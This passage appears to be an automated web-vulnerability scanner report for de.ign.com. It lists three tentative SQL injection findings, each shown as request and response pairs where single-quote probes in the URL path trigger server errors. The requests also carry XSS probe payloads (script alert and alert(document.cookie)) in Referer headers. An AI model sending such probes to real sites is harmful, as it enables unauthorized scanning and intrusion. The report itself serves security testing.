nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61256,61583,61766,65373&RawValues=&random=ARzkrx,bguRragewbmIe HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:32 GMT
Connection: close
Vary: Accept-Encoding


1.12. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158994&FlightID=142418&TargetID=26016&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwoNmIm,bguRqRgbdmoWr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158994&FlightID=142418&TargetID=26016&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwoNmIm,bguRqRgbdmoWr

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158994&FlightID=142418&TargetID=26016&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwoNmIm,bguRqRgbdmoWr HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158994&FlightID=142418&TargetID=26016&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwoNmIm,bguRqRgbdmoWr HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:11 GMT
Connection: close
Vary: Accept-Encoding


1.13. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwoRrgj,bguRrfrbdmWae [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwoRrgj,bguRrfrbdmWae

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwoRrgj,bguRrfrbdmWae HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwoRrgj,bguRrfrbdmWae HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:48 GMT
Connection: close
Vary: Accept-Encoding


1.14. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bkNmutt,bguRragewbmAt [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bkNmutt,bguRragewbmAt

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bkNmutt,bguRragewbmAt HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bkNmutt,bguRragewbmAt HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:29 GMT
Connection: close
Vary: Accept-Encoding


